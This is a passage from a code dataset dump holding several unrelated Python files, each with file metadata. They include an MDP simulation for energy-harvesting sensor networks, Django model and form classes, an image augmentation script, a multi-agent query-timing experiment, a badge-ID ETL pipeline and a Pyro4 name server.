distance_accountable_max, gen_prob, packet_length, x_max,\n y_max, z_max, checker_gateway, debug)\n nodes.append(n)\n\n for n_starting in np.argsort(start):\n next_starting_time = start[n_starting]\n env.run(until=next_starting_time)\n env.process(nodes[n_starting].run())\n\n for i in range(num_updates):\n progress += chunk\n env.run(until=progress)\n print(\"Progress: {} out of {}\".format(progress, sim_time))\n\n tot_r = 0\n for g in gateways:\n tot_r += g.reward\n\n if debug:\n print('Total reward: {}\\nMean reward: {}'.format(tot_r, tot_r / num_nodes))\n\n return tot_r\n\n\n# def get_state(battery, packet, distance):\n# return int(battery * y_max * z_max + packet * z_max + 
distance)\n\ndef simulate_MDP():\n\n policy = pickle.load(open(\"./Policies 097 002 001 mean/33.0-17.0-infinite.p\", \"rb\"))\n # policy = np.zeros((len(pi.policy), 3))\n # policy[np.arange(len(pi.policy)), np.array(pi.policy)] = 1\n # policy = pi.policy\n policy_unravelled = np.array(policy).reshape((x_max, y_max, z_max))\n\n uniform_cdf = [uniform.cdf(x, gateway_distance_min_q, max(gateway_distance_max_q - gateway_distance_min_q, 0.001))\n for x in range(z_max)]\n harvesting_rates = getEnergyHarvestingRates()\n\n # 8333.3333\n battery = 0\n distance = 0\n packet = 0\n\n tot_rewards = []\n max_time = int(100 / deltaT)\n for _ in range(100):\n reward = 0\n\n for it in range(max_time):\n action = policy_unravelled[battery, packet, distance] # pi.policy[get_state(battery, packet, distance)]\n\n if np.random.random() <= uniform_cdf[distance]:\n distance = 0\n else:\n distance = (distance + 1) % z_max\n\n if action == 0:\n battery = int(np.clip(battery + harvesting_rates[battery], 0, energy_quantum_storable_max))\n elif action == 1:\n battery = int(np.clip(battery + harvesting_rates[battery] - ram_consumption, 0, energy_quantum_storable_max))\n else:\n battery = int(np.clip(battery + harvesting_rates[battery] - transmit_consumption[packet], 0, energy_quantum_storable_max))\n\n reward += (packet_length[packet] * packets_priorities[packet]) * (action == 2)\n\n if action != 1:\n packet = np.random.choice(3, p=gen_prob)\n\n tot_rewards.append(reward)\n\n print(np.mean(tot_rewards))\n exit(-1)\n print(\"ok\")\n\n\ndef sweep_values():\n global gateway_distance_max, gateway_distance_min, gateway_distance_max_q, gateway_distance_min_q, distance_accountable_max, z_max, num_states, gen_prob\n\n rewards = list()\n\n policy_name = \"MDP\" # MDP, AS, OSHP, RP, HHP, CSP, NSP, TP\n print(\"Running policy\", policy_name)\n steps = 1\n # simulate_MDP()\n\n probs_lambda_0 = np.round(np.linspace(0.99, 0.8, 11), 3)\n gateway_distance_min = 0.05\n gateway_distance_max = 0.05\n\n gateway_distance_max_q = round(gateway_distance_max / deltaS) # in deltaS\n gateway_distance_min_q = round(gateway_distance_min / deltaS) # in deltaS\n distance_accountable_max = round(gateway_distance_max / deltaS)\n z_max = int(distance_accountable_max + 1)\n num_states = x_max * y_max * z_max\n\n with open(\"out_{}.txt\".format(policy_name), \"a+\") as file:\n for i, prob_lambda_0 in enumerate(probs_lambda_0):\n # gen_prob = np.array([0.97, 0.02, 0.01])\n gen_prob[0] = prob_lambda_0\n gen_prob[2] = (1 - prob_lambda_0) / 3\n gen_prob[1] = 2 * gen_prob[2]\n\n assert abs(gen_prob.sum() - 1) < 1e-4\n\n assert (gateway_distance_max - gateway_distance_min) > -1e-5\n if gateway_distance_max < gateway_distance_min:\n gateway_distance_max = gateway_distance_min\n print('Correcting small distances')\n\n infinite = True\n if infinite:\n path_file = \"{}-infinite.p\".format(prob_lambda_0)\n else:\n path_file = \"{}.p\".format(prob_lambda_0)\n\n if path.isfile(path_file):\n warnings.warn('Loading the policy from the HDD')\n policy = pickle.load(open(path_file, 'rb'))\n else:\n policy = re_compute_policy(path_file, infinite)\n\n seeds = np.arange(i * RUNS, (i + 1) * RUNS)\n\n policy_unravelled = np.array(policy).reshape((x_max, y_max, z_max))\n # exit(0)\n continue\n\n compute_reward_fixed = partial(compute_reward, policy_name=policy_name)\n\n if WORKERS > 1:\n with ProcessPoolExecutor(max_workers=WORKERS) as executor:\n p = executor.map(compute_reward_fixed, zip(repeat(policy), repeat(NUM_NODES), seeds))\n reward_list = np.array(list(p))\n else:\n 
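# serial fallback: with a single worker, run each simulation in this process\n 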
reward_list = list()\n for j in range(RUNS):\n reward_list.append(compute_reward_fixed([policy, NUM_NODES, seeds[j]]))\n\n mean_r = np.mean(reward_list)\n std_r = np.std(reward_list)\n rewards.append((mean_r, std_r))\n\n print('Reward {} for pos = {} -> mean: {}, std: {}'.format(policy_name, prob_lambda_0, mean_r, std_r))\n file.write('Reward {} for pos = {} -> mean: {}, std: {}\\n'.format(policy_name, prob_lambda_0, mean_r, std_r))\n exit()\n file.flush()\n os.fsync(file.fileno())\n # print(reward_list)\n\n pickle.dump(rewards, open('rewards-{}.p'.format(policy_name), 'wb'))\n\n\ndef re_compute_policy(path_file, infinite=False):\n uniform_cdf = [uniform.cdf(x, gateway_distance_min_q - 1, max(gateway_distance_max_q -\n gateway_distance_min_q, 0.001)) for x in range(z_max)]\n\n assert gen_prob.sum() - 1 < 1e-10\n print('Computing policy for Lambda = {}'.format(gen_prob))\n\n T = np.zeros((num_actions, num_states, num_states)) # A x S x S'\n R = np.zeros((num_states, num_actions)) # S x A\n\n harvesting_rates = getEnergyHarvestingRates()\n\n 
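# states are flattened 3D indices: state = x * y_max * z_max + y * z_max + z,\n # where x = battery level, y = packet class, z = distance since the last gateway\n 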
for x in range(x_max):\n for y in range(y_max):\n for z in range(z_max):\n state = x * y_max * z_max + y * z_max + z\n harvest_rate = harvesting_rates[x]\n\n # x_c = state // (y_max * z_max)\n # y_c = (state - (x_c * y_max * z_max)) // z_max\n # z_c = state - (x_c * y_max * z_max) - (y_c * z_max)\n #\n # assert x_c == x and y_c == y and z_c == z\n\n # action drop it\n new_energy_value = min(x + harvest_rate, energy_quantum_storable_max)\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[0, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[0, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n # action keep it\n if y != 0 and x >= ram_consumption: # packet stored in buffer, can still keep it\n # don't move in the y-axis since we are keeping the packet\n new_energy_value = max(min(x + harvest_rate - ram_consumption, energy_quantum_storable_max), 0)\n\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y * z_max + z_gateway)\n\n T[1, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * 1\n T[1, state, state_p_yes_gateway] = (uniform_cdf[z]) * 1\n else: #\n # don't have enough energy to keep the packet in the buffer, drop it and maybe generate another\n # however, we model the ram_consumption to penalize trying to keep it\n new_energy_value = max(min(x + harvest_rate - ram_consumption, energy_quantum_storable_max), 0)\n\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[1, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[1, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n # action transmit it\n # if y != 0 and z == 0 and x >= transmit_consumption[y]:\n if y != 0 and z < gateway_coverage_markov and x >= transmit_consumption[y]:\n # packet stored in buffer, I am in gateway coverage, and have enough energy to transmit it:\n # let's transmit it!\n new_energy_value = max(min(x + harvest_rate - transmit_consumption[y], energy_quantum_storable_max),\n 0)\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[2, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[2, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n else: # trying to transmit but unable to do so\n # however, model the consumption derived from the transmission to penalize it\n new_energy_value = max(min(x + harvest_rate - transmit_consumption[y], energy_quantum_storable_max),\n 0)\n\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[2, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[2, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n assert np.allclose(T.sum(axis=2), 1, rtol=1e-7)\n assert len(np.where(T < 0)[0]) == 0, 'This should not happen'\n\n for x in range(x_max):\n for y in range(1, y_max): # if y == 0 -> R = 0, regardless of the action\n z = 0 # can only transmit if we are within a gateway range\n\n if x < transmit_consumption[y]: # can only transmit if enough charge is available\n continue\n\n state = x * y_max * z_max + y * z_max + z\n\n reward = packet_length[y] * packets_priorities[y]\n R[state, 2] = reward\n\n\n if infinite:\n pi = mdptoolbox.mdp.RelativeValueIteration(T, R, epsilon=0.005, max_iter=5000)\n pi.run()\n pickle.dump(pi.policy, open(path_file, 'wb'))\n print('finished computing infinite Pi')\n else:\n pi = mdptoolbox.mdp.ValueIteration(T, R, dr)\n pi.run()\n pickle.dump(pi.policy, open(path_file, 'wb'))\n print('finished computing discounted Pi')\n\n return pi.policy\n\n\nif __name__ == '__main__':\n sweep_values()\n","sub_path":"network-probability-sweep.py","file_name":"network-probability-sweep.py","file_ext":"py","file_size_in_byte":17326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"249055102","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"Vinícius Madureira\"\n__copyright__ = \"Copyright 2020, Vinícius Madureira\"\n__license__ = \"Creative Commons Zero 1.0 Universal\"\n__version__ = \"0.01a\"\n__maintainer__ = \"Vinícius Madureira\"\n__email__ = \"viniciusmadureira@outlook.com\"\n__status__ = \"Testing\"\n\nfrom model.category import Category\nimport re\n\n\"\"\"\nProduct class: Model for Product type objects.\nEach product contains a name (str), a description (str) and a value (float).\n\"\"\"\nclass Product:\n\n def __init__(self, name: str = \"\", description: str = \"\", value: float = None, category: Category = None, picture: str=\"\"):\n self.__name = name\n self.__description = description\n self.__value = value\n self.__category = category\n self.__picture = picture\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name):\n self.__name = None\n try:\n name = str(name).strip()\n if (re.search(r\"^[\\w]{2,}(\\s[\\d\\w\\-,;\\+]+)*$\", name, re.UNICODE) and len(name) <= 100):\n self.__name = name\n except:\n pass\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def 
description(self, description):\n self.__description = None\n try:\n description = str(description).strip()\n if (2 <= len(description) <= 400):\n self.__description = description\n except:\n pass\n \n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value):\n self.__value = None\n try:\n if not isinstance(value, float):\n value = float(re.search(r\"\\d+(\\.\\d+)?\", str(value).replace(\",\", \".\").strip())[0])\n if value >= 0.0: \n self.__value = int(value * 10**3) / 10**3 \n except:\n pass\n\n @property\n def category(self):\n return self.__category\n\n @category.setter\n def category(self, category: Category):\n self.__category = None\n if category.isValid():\n self.__category = category\n\n @property\n def picture(self):\n return self.__picture\n\n @picture.setter\n def picture(self, picture: str):\n self.__picture = None\n if re.search(r\"^\\w{1,96}\\.(png|jpg|gif)$\", picture, re.UNICODE):\n self.__picture = picture\n\n def isValid(self):\n return self.__name != None and self.__value != None and self.__category != None\n","sub_path":"vgrocery/model/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"623831701","text":"# Day_03_07_augmentation.py\nimport Augmentor\n\n\ndef usage_1():\n p = Augmentor.Pipeline('cifar10_mini')\n\n p.rotate(probability=0.7,\n max_left_rotation=10,\n max_right_rotation=10)\n p.zoom(probability=0.5,\n min_factor=1.1,\n max_factor=1.5)\n\n p.sample(3)\n\n\ndef usage_2():\n p = Augmentor.Pipeline('cifar10_mini')\n\n p.resize(probability=1, width=120, height=120)\n p.random_distortion(probability=1,\n grid_width=4,\n grid_height=4,\n magnitude=2)\n\n p.sample(3)\n\n\n# usage_1()\nusage_2()\n\n\n\n\n","sub_path":"ncia_cnn/Day_03_07_augmentation.py","file_name":"Day_03_07_augmentation.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546224194","text":"\"\"\"\nRuns experimental analysis of query timing strategies in a complicated domain\n\"\"\"\nimport context\nimport random\nfrom src.environment import ToolFetchingEnvironment\nimport numpy as np\nfrom src.agents.agent import RandomWorkerPolicy\nfrom src.agents.agent import PlanPolicy\nfrom src.agents.agent_adhoc_q import FetcherQueryPolicy\nfrom src.agents.agent_adhoc_q import FetcherAltPolicy\nfrom src.agents.agent_adhoc_q import never_query\nfrom itertools import permutations\nimport pandas as pd\nimport json\nimport argparse\nfrom time import sleep\n\ndef query_beginning(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, replace=False)\n\ndef query_ZQ(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n if np.array_equal(t_pos[0], f_pos):\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, replace=False)\n return None\n\nrand_time = -1\ntime = 0\ndef query_random(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n if time >= rand_time:\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, 
replace=False)\n return None\n\nstrats = {'X': never_query, 'First': query_beginning, 'ZQ': query_ZQ, 'Random': query_random}\n\n\ndef experiment(args):\n global time\n global rand_time\n results = {}\n results['graph 1'] = {}\n def rand_path_perm(stn_pos, worker_pos):\n worker_path = []\n offset = stn_pos-worker_pos\n\n if offset[0] >= 0:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.RIGHT] * offset[0]\n else:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.LEFT] * -offset[0]\n\n if offset[1] >= 0:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.UP] * offset[1]\n else:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.DOWN] * -offset[1]\n\n random.shuffle(worker_path)\n return worker_path\n def dist(p1, p2):\n return abs(p1[0]-p2[0]) + abs(p1[1]-p2[1])\n for strat in strats:\n results['graph 1'][strat] = []\n results['graph 1']['baseline'] = []\n for t in range(args.num_exp):\n if args.cluster_stations:\n num_clusters = args.num_stations//4\n cluster_pos = [(i,j) for i in range(args.grid_size//2) for j in range(args.grid_size//2)]\n cluster_pos = random.sample(cluster_pos, num_clusters)\n stations_pos = np.array([k for i,j in cluster_pos for k in [(2*i,2*j), (2*i+1, 2*j), (2*i, 2*j+1), (2*i+1, 2*j+1)]])\n else:\n stations_pos = [(i,j) for i in range(args.grid_size) for j in range(args.grid_size)]\n stations_pos = np.array(random.sample(stations_pos, args.num_stations))\n pos = [(i,j) for i in range(args.grid_size) for j in range(args.grid_size)]\n tool_pos = np.array(random.choice(pos))\n tools_pos = np.array([tool_pos for _ in range(len(stations_pos))])\n fetcher_pos = np.array(random.choice(pos))\n worker_pos = np.array(random.choice(pos))\n goal = int(random.random()*len(stations_pos))\n env = ToolFetchingEnvironment(fetcher_pos, worker_pos, stations_pos, tools_pos, goal, width=args.grid_size, height=args.grid_size)\n path = rand_path_perm(stations_pos[goal], worker_pos)\n results['graph 1']['baseline'].append(-int(max(dist(worker_pos, stations_pos[goal]), dist(fetcher_pos, tools_pos[goal])+dist(tools_pos[goal], stations_pos[goal]))))\n for strat in strats:\n obs = env.reset()\n done = [False, False]\n fetcher = FetcherQueryPolicy(query_policy=strats[strat])\n worker = PlanPolicy(path + [ToolFetchingEnvironment.WORKER_ACTIONS.WORK])\n cost = 0\n time = 0\n rand_time = int(random.random()*args.grid_size)\n while not done[0]:\n if args.render:\n env.render()\n sleep(0.05)\n input()\n obs, reward, done, _ = env.step([worker(obs[0]), fetcher(obs[1])])\n cost += reward[1]\n time += 1\n results['graph 1'][strat].append(int(cost))\n env.close()\n return results\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output', default='results.json', help='Output File')\n parser.add_argument('--render', action='store_true', help='Flag should be present if rendering is desired')\n parser.add_argument('--num_exp', default=100, type=int, help='Number of experiments to run')\n parser.add_argument('--grid_size', default=100, type=int, help='Grid Size of environment')\n parser.add_argument('--num_stations', default=400, type=int, help='Number of stations in environment')\n parser.add_argument('--cluster_stations', action='store_true', help='Flag should be present if stations are clustered')\n\n args = parser.parse_args()\n\n results = experiment(args)\n with open(args.output, 'w') as f:\n json.dump(results, 
f)\n\n\n","sub_path":"experiments/experiment3.py","file_name":"experiment3.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"93341370","text":"import bonobo\nimport bonobo_sqlalchemy\nimport os\n\nfrom bonobo.config import use, use_context, use_raw_input, use_context_processor\n\nfrom bonobo.constants import NOT_MODIFIED\n\nfrom dateutil.relativedelta import relativedelta\n\nid_cache = {}\n\n\ndef _cache(self, context):\n yield id_cache\n\n\n@use_context_processor(_cache)\ndef cache(badge_id_cache, badge_id, empty1, last_name, empty2, first_name,\n *args):\n\n if last_name.lower() not in badge_id_cache:\n badge_id_cache[last_name.lower()] = dict()\n\n if first_name.lower() not in badge_id_cache[last_name.lower()]:\n badge_id_cache[last_name.lower()][first_name.lower()] = set()\n\n badge_id_cache[last_name.lower()][first_name.lower()].add(badge_id)\n\n return NOT_MODIFIED\n\n\ndef badge_active(badge_id, empty1, last_name, empty2, first_name, empty3,\n issued_on, empty4, disabled, *args):\n\n if disabled == 'True':\n return\n\n return NOT_MODIFIED\n\n\ndef get_cache_graph(**options):\n \"\"\"\n\n This graphs builds a cache of badges from ccure\n \n :return: bonobo.Graph\n\n \"\"\"\n\n graph = bonobo.Graph()\n\n graph.add_chain(\n bonobo.CsvReader(\n '/etl/ccure/uploads/BadgeID/ccure_BadgeID_AllButVendor.txt',\n fields=('badge_id', 'empty1', 'last_name', 'empty2', 'first_name',\n 'empty3', 'issued_on', 'empty4', 'disabled', 'empty5',\n 'valid_until', 'empty6', 'flag2', 'empty7', 'flag3',\n 'empty8', 'flag4'),\n delimiter='|',\n fs='brickftp'),\n badge_active,\n cache,\n )\n\n return graph\n\n\ndef get_graph(**options):\n \"\"\"\n This function builds the graph that needs to be executed.\n\n :return: bonobo.Graph\n\n \"\"\"\n\n graph = bonobo.Graph()\n\n split_dbs = bonobo.noop\n\n graph.add_chain(\n bonobo.CsvReader(\n '/etl/metrics-insights/workday-users.csv', fs='brickftp'),\n employee_active, find_badge_id, bonobo.UnpackItems(0), split_dbs)\n\n for engine in list(set(options['engine'])):\n graph.add_chain(\n bonobo_sqlalchemy.InsertOrUpdate(\n table_name=options['table_name'] + options['table_suffix'],\n discriminant=('badgeid', ),\n buffer_size=10,\n engine=engine),\n _input=split_dbs)\n\n return graph\n\n\ndef employee_active(employee_id=None,\n Last_Name=None,\n First_Name=None,\n Preffered_Last_Name=None,\n Preferred_First_Name=None,\n Hire_Date=None,\n Email=None,\n Cost_Center_Name=None,\n Cost_Center_Number=None,\n Cost_Center_Hierarchy=None,\n Employee_Type=None,\n Employee_Status=None,\n Business_Title=None,\n Work_Location=None,\n Manager=None,\n Supervisory_Organization=None,\n manager_level_02=None,\n Manager_s_Manager_Supervisory_Organization=None,\n manager_level_03=None,\n manager_level_04=None,\n manager_level_05=None,\n termination_date=None):\n \"\"\"Filter out employees that are NOT active\"\"\"\n\n if Employee_Status == 'Active':\n return NOT_MODIFIED\n\n\n@use_context_processor(_cache)\ndef find_badge_id(badge_id_cache,\n employee_id=None,\n Last_Name=None,\n First_Name=None,\n Preffered_Last_Name=None,\n Preferred_First_Name=None,\n Hire_Date=None,\n Email=None,\n Cost_Center_Name=None,\n Cost_Center_Number=None,\n Cost_Center_Hierarchy=None,\n Employee_Type=None,\n Employee_Status=None,\n Business_Title=None,\n Work_Location=None,\n Manager=None,\n Supervisory_Organization=None,\n manager_level_02=None,\n Manager_s_Manager_Supervisory_Organization=None,\n 
manager_level_03=None,\n manager_level_04=None,\n manager_level_05=None,\n termination_date=None):\n\n plname = badge_id_cache.get(Preffered_Last_Name.lower(), {})\n lname = badge_id_cache.get(Last_Name.lower(), {})\n\n lname.update(plname)\n\n pfname = lname.get(Preferred_First_Name.lower(), set())\n fname = lname.get(First_Name.lower(), set())\n\n fname.update(pfname)\n\n for badge_id in fname:\n yield {\n 'employee_id': employee_id,\n 'first_name': First_Name.title(),\n 'last_name': Last_Name.title(),\n 'badgeid': badge_id,\n 'email': Email,\n }\n\n\nimport json\n\n\ndef get_services(**options):\n \"\"\"\n This function builds the services dictionary, which is a simple dict of names-to-implementation used by bonobo\n for runtime injection.\n\n It will be used on top of the defaults provided by bonobo (fs, http, ...). You can override those defaults, or just\n let the framework define them. You can also define your own services and naming is up to you.\n\n :return: dict\n \"\"\"\n\n return {}\n\n\n# The __main__ block actually execute the graph.\nif __name__ == '__main__':\n if not __package__:\n from os import sys, path\n top = path.dirname(\n path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))\n sys.path.append(top)\n\n me = []\n me.append(path.split(path.dirname(path.abspath(__file__)))[1])\n me.insert(\n 0,\n path.split(path.dirname(path.dirname(path.abspath(__file__))))[1])\n me.insert(\n 0,\n path.split(\n path.dirname(\n path.dirname(path.dirname(path.abspath(__file__)))))[1])\n\n __package__ = '.'.join(me)\n\n from ... import add_default_arguments, add_default_services\n\n parser = bonobo.get_argument_parser()\n\n add_default_arguments(parser)\n\n parser.add_argument(\n '--table-name',\n type=str,\n default=os.getenv('BOOMI_TABLE', 'f_employee'))\n\n with bonobo.parse_args(parser) as options:\n services = get_services(**options)\n add_default_services(services, options)\n\n g1 = get_cache_graph(**options)\n print(\"# Running card_id cache\")\n bonobo.run(g1, services=services)\n\n g2 = get_graph(**options)\n print(\"# Runing employee mapping\")\n bonobo.run(g2, services=services)\n","sub_path":"mozilla_etl/boomi/ccure/email/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"602303990","text":"\"\"\"\nImplementation of name server.\n\"\"\"\nimport os\nimport time\nimport random\nimport multiprocessing\n\nimport Pyro4\nfrom Pyro4.errors import NamingError\nfrom Pyro4.naming import BroadcastServer\n\nfrom .common import format_exception\nfrom .common import address_to_host_port\nfrom .address import AgentAddress\nfrom .address import SocketAddress\nfrom .proxy import Proxy\nfrom .proxy import NSProxy\n\n\n@Pyro4.expose\nclass NameServer(Pyro4.naming.NameServer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.shutdown_parent_daemon = False\n\n def ping(self):\n \"\"\"\n A simple test method to check if the name server is running correctly.\n \"\"\"\n return 'pong'\n\n def agents(self):\n \"\"\"\n List agents registered in the name server.\n \"\"\"\n agents = self.list()\n return [name for name in agents if name != 'Pyro.NameServer']\n\n def async_shutdown_agents(self):\n \"\"\"\n Shutdown all agents registered in the name server.\n \"\"\"\n for name, address in self.list().items():\n if name == 'Pyro.NameServer':\n continue\n agent = Pyro4.core.Proxy(address)\n agent.shutdown()\n\n def 
async_shutdown(self):\n \"\"\"\n Shutdown the name server. All agents will be shutdown as well.\n \"\"\"\n self.async_shutdown_agents()\n self.shutdown_parent_daemon = True\n\n\nPyro4.naming.NameServer = NameServer\n\n\nclass NameServerProcess(multiprocessing.Process):\n \"\"\"\n Name server class. Instances of a name server are system processes which\n can be run independently.\n \"\"\"\n def __init__(self, addr=None):\n super().__init__()\n if isinstance(addr, int):\n addr = '127.0.0.1:%s' % addr\n self.addr = addr\n self.host, self.port = address_to_host_port(addr)\n self.shutdown_event = multiprocessing.Event()\n self.uri = None\n self.queue = multiprocessing.Queue()\n\n def run(self):\n # Capture SIGINT\n\n try:\n self.daemon = Pyro4.naming.NameServerDaemon(self.host, self.port)\n except Exception:\n self.queue.put(format_exception())\n return\n self.queue.put('STARTED')\n self.uri = self.daemon.uriFor(self.daemon.nameserver)\n self.host = self.uri.host\n self.port = self.uri.port\n self.addr = AgentAddress(self.host, self.port)\n internal_uri = self.daemon.uriFor(self.daemon.nameserver, nat=False)\n enable_broadcast = True\n bcserver = None\n hostip = self.daemon.sock.getsockname()[0]\n if hostip.startswith(\"127.\"):\n print(\"Not starting broadcast server for localhost.\")\n enable_broadcast = False\n if enable_broadcast:\n # Make sure to pass the internal uri to the broadcast\n # responder. It is almost always useless to let it return\n # the external uri, because external systems won't be able\n # to talk to this thing anyway.\n bcserver = BroadcastServer(internal_uri)\n print(\"Broadcast server running on %s\" % bcserver.locationStr)\n bcserver.runInThread()\n print(\"NS running on %s (%s)\" % (self.daemon.locationStr, hostip))\n print(\"URI = %s\" % self.uri)\n try:\n self.daemon.requestLoop(\n lambda: (not self.shutdown_event.is_set() and\n not self.daemon.nameserver.shutdown_parent_daemon)\n )\n finally:\n self.daemon.close()\n if bcserver is not None:\n bcserver.close()\n print(\"NS shut down.\")\n\n def start(self):\n os.environ['OSBRAIN_NAMESERVER_ADDRESS'] = str(self.addr)\n super().start()\n status = self.queue.get()\n if status == 'STARTED':\n return\n raise RuntimeError('An error occured while creating the daemon!' +\n '\\n===============\\n'.join(['', status, '']))\n\n def agents(self):\n \"\"\"\n List agents registered in the name server.\n \"\"\"\n proxy = NSProxy(self.addr)\n agents = proxy.list()\n proxy.release()\n return [name for name in agents if name != 'Pyro.NameServer']\n\n def shutdown_all(self):\n \"\"\"\n Shutdown all agents registered in the name server.\n \"\"\"\n for agent in self.agents():\n agent = Proxy(agent, self.addr)\n agent.shutdown()\n\n def shutdown(self):\n \"\"\"\n Shutdown the name server. 
All agents will be shutdown as well.\n \"\"\"\n self.shutdown_all()\n nameserver = NSProxy(self.addr)\n # Wait for all agents to be shutdown (unregistered)\n while len(nameserver.list()) > 1:\n time.sleep(0.1)\n self.shutdown_event.set()\n self.terminate()\n self.join()\n\n\ndef random_nameserver():\n \"\"\"\n Start a random name server.\n\n Returns\n -------\n SocketAddress\n The name server address.\n \"\"\"\n while True:\n try:\n # Bind to random port\n host = '127.0.0.1'\n port = random.randrange(10000, 20000)\n addr = SocketAddress(host, port)\n nameserver = NameServerProcess(addr)\n nameserver.start()\n return addr\n except NamingError:\n continue\n except PermissionError:\n continue\n except:\n raise\n\n\ndef run_nameserver(addr=None):\n \"\"\"\n Ease the name server creation process.\n\n This function will create a new nameserver, start the process and then run\n its main loop through a proxy.\n\n Parameters\n ----------\n addr : SocketAddress, default is None\n Name server address.\n\n Returns\n -------\n proxy\n A proxy to the name server.\n \"\"\"\n if not addr:\n addr = random_nameserver()\n else:\n NameServerProcess(addr).start()\n return NSProxy(addr)\n","sub_path":"osbrain/nameserver.py","file_name":"nameserver.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"477376073","text":"\"\"\"\n* Purpose: Forms\n\n* @author: Nikhil Lad\n* @version: 3.7\n* @since: 01-2-2019\n\n\"\"\"\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect\nfrom image import settings\nfrom requests import request\nfrom django.contrib.auth.forms import UserCreationForm,AuthenticationForm\nfrom PIL import Image\nfrom django import forms\nfrom .models import Photo\nfrom .cloud_services import s3_services\n\nUser= get_user_model()\n\nclass LoginForm(forms.ModelForm):\n model=User\n class Meta:\n fields=['username','password',]\n\n\n\nclass SignupForm(UserCreationForm): # inheriting user-creation form to create form with following fields\n\n email=forms.RegexField(regex=r'^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',required=True)\n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\n def save(self, commit=True):\n user = super(SignupForm, self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n\nclass loginForm(AuthenticationForm): # inheriting user-creation form to create form with following fields\n class Meta:\n model = User\n fields = ('username','password')\n\n def save(self, commit=True):\n user = super(loginForm, self).save(commit=False)\n\n if commit:\n user.save()\n return user\n\nclass ImageUploadForm(forms.Form):\n image = forms.ImageField(label='Select a file')\n\n\n\n\n\n\nclass PhotoForm(forms.ModelForm):\n username = forms.CharField(required=True,label='Username',widget=forms.TextInput(attrs={'placeholder': 'Username '}))\n x = forms.FloatField(widget=forms.HiddenInput())\n y = forms.FloatField(widget=forms.HiddenInput())\n width = forms.FloatField(widget=forms.HiddenInput())\n height = 